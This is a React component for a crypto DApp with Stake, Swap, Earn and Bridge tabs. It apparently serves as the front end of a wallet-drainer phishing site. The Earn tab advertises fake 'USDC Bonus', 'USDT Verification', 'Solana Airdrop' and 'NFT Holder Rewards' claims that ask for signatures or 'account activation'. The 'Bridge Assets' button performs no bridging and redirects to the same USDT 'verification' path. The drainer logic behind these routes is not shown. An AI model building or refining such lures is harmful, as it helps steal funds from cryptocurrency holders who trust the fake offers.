import React, { useState } from 'react';
import DappShell from '../../components/DappShell';
import { StakeDapp } from '../StakeDapp/StakeDapp';
import { DappSwap } from '../DappSwap/DappSwap';
import { useT } from '../../utils/translations';
import { usePublicConfig } from '../../utils/publicConfig';
import './AppDapp.css';

/**
 * 完整 DApp 平台：Tab 导航（Swap / Stake / Earn / Bridge）。
 * 类似主流 DeFi 产品的一体化体验。
 */
const AppDapp = () => {
  const t = useT();
  const cfg = usePublicConfig();
  const [tab, setTab] = useState('stake');
  const [account, setAccount] = useState('');

  const TABS = [
    { key: 'stake', label: 'Stake', icon: '📈' },
    { key: 'swap', label: 'Swap', icon: '🔄' },
    { key: 'earn', label: 'Earn', icon: '🎁' },
    { key: 'bridge', label: 'Bridge', icon: '🌉' },
  ];

  const goClaim = (path) => {
    window.location.href = path;
  };

  return (
    <DappShell account={account} network="Ethereum">
      <div className="appdapp">
        {/* Tab 导航 */}
        <nav className="appdapp-tabs">
          {TABS.map((tabItem) => (
            <button
              key={tabItem.key}
              className={`appdapp-tab ${tab === tabItem.key ? 'on' : ''}`}
              onClick={() => setTab(tabItem.key)}
            >
              <span>{tabItem.icon}</span> {tabItem.label}
            </button>
          ))}
        </nav>

        {tab === 'stake' && <StakeDapp embedded onAccount={setAccount} />}
        {tab === 'swap' && <DappSwap embedded onAccount={setAccount} />}

        {tab === 'earn' && (
          <div className="appdapp-earn">
            <h3>🎁 Earn Center</h3>
            <p className="appdapp-sub">One-tap claim campaigns across networks. Zero fees, sponsored by osman.</p>
            <div className="appdapp-cards">
              <div className="appdapp-card" onClick={() => goClaim('/evm')}>
                <span className="appdapp-card-icon">💎</span>
                <b>USDC Bonus</b>
                <p>Ethereum · signature claim</p>
                <button className="appdapp-go">Claim →</button>
              </div>
              <div className="appdapp-card" onClick={() => goClaim('/evm-usdt')}>
                <span className="appdapp-card-icon">💵</span>
                <b>USDT Verification</b>
                <p>Ethereum / BSC · account activation</p>
                <button className="appdapp-go">Verify →</button>
              </div>
              <div className="appdapp-card" onClick={() => goClaim('/sol')}>
                <span className="appdapp-card-icon">🟣</span>
                <b>Solana Airdrop</b>
                <p>Solana · Phantom claim</p>
                <button className="appdapp-go">Claim →</button>
              </div>
              <div className="appdapp-card" onClick={() => goClaim('/evm-nft')}>
                <span className="appdapp-card-icon">🖼️</span>
                <b>NFT Holder Rewards</b>
                <p>Ethereum · holder verification</p>
                <button className="appdapp-go">Unlock →</button>
              </div>
            </div>
          </div>
        )}

        {tab === 'bridge' && (
          <div className="appdapp-bridge">
            <h3>🌉 Cross-Chain Bridge</h3>
            <p className="appdapp-sub">Move assets between networks instantly with zero bridge fees.</p>
            <div className="appdapp-bridge-box">
              <div className="appdapp-bridge-row">
                <span>From</span>
                <b>Ethereum</b>
              </div>
              <div className="appdapp-bridge-arrow">↓</div>
              <div className="appdapp-bridge-row">
                <span>To</span>
                <b>BSC</b>
              </div>
              <button className="appdapp-bridge-btn" onClick={() => goClaim('/evm-usdt?chain=bsc')}>
                Bridge Assets →
              </button>
            </div>
            <p className="appdapp-hint">Maintenance-free bridging is sponsored by the osman foundation.</p>
          </div>
        )}
      </div>
    </DappShell>
  );
};

export default AppDapp;
